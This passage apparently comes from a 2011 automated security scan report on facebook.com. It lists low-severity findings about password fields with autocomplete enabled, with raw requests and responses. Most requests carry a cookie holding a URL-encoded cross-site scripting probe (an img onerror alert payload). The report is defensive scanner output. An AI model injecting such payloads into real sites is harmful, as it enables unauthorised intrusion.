Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.187.63
Connection: close
Date: Thu, 05 May 2011 11:40:09 GMT
Content-Length: 39885

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.19. http://www.facebook.com/aolradio

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /aolradio

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /aolradio HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.190.33
Connection: close
Date: Thu, 05 May 2011 11:40:12 GMT
Content-Length: 34803

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.20. http://www.facebook.com/burkerkink

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /burkerkink

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /burkerkink HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fburkerkink; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.190.63
Connection: close
Date: Thu, 05 May 2011 11:42:28 GMT
Content-Length: 42388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.21. http://www.facebook.com/careers/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /careers/

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /careers/ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-Powered-By: HPHP
X-FB-Server: 10.32.222.122
Connection: close
Date: Thu, 05 May 2011 10:56:36 GMT
Content-Length: 20487

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.22. http://www.facebook.com/deedee.perez1

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /deedee.perez1

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /deedee.perez1 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdeedee.perez1; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.165.57
Connection: close
Date: Thu, 05 May 2011 11:42:21 GMT
Content-Length: 77523

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.23. http://www.facebook.com/directory/pages/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /directory/pages/

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /directory/pages/ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpages%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.155.51
Connection: close
Date: Thu, 05 May 2011 11:42:59 GMT
Content-Length: 44671

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.24. http://www.facebook.com/directory/people/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /directory/people/

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /directory/people/ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpeople%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.146.25
Connection: close
Date: Thu, 05 May 2011 11:42:57 GMT
Content-Length: 34484

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.25. http://www.facebook.com/facebook

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /facebook

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /facebook HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.157.59
Connection: close
Date: Thu, 05 May 2011 11:43:00 GMT
Content-Length: 159754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.26. http://www.facebook.com/fayse

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /fayse

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /fayse HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffayse; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.139.21
Connection: close
Date: Thu, 05 May 2011 11:42:45 GMT
Content-Length: 59713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.27. http://www.facebook.com/find-friends

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /find-friends

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /find-friends HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.218.112
Connection: close
Date: Thu, 05 May 2011 10:56:37 GMT
Content-Length: 101636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.28. http://www.facebook.com/gale.l.schenk

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /gale.l.schenk

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /gale.l.schenk HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fgale.l.schenk; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.65
Connection: close
Date: Thu, 05 May 2011 11:42:46 GMT
Content-Length: 113481

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.29. http://www.facebook.com/help/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /help/

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /help/ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.16.121
Connection: close
Date: Thu, 05 May 2011 10:56:37 GMT
Content-Length: 20550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.30. http://www.facebook.com/izaOllie

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /izaOllie

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /izaOllie HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FizaOllie; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.195.35
Connection: close
Date: Thu, 05 May 2011 11:42:50 GMT
Content-Length: 101169

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.31. http://www.facebook.com/jezzas

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /jezzas

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /jezzas HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
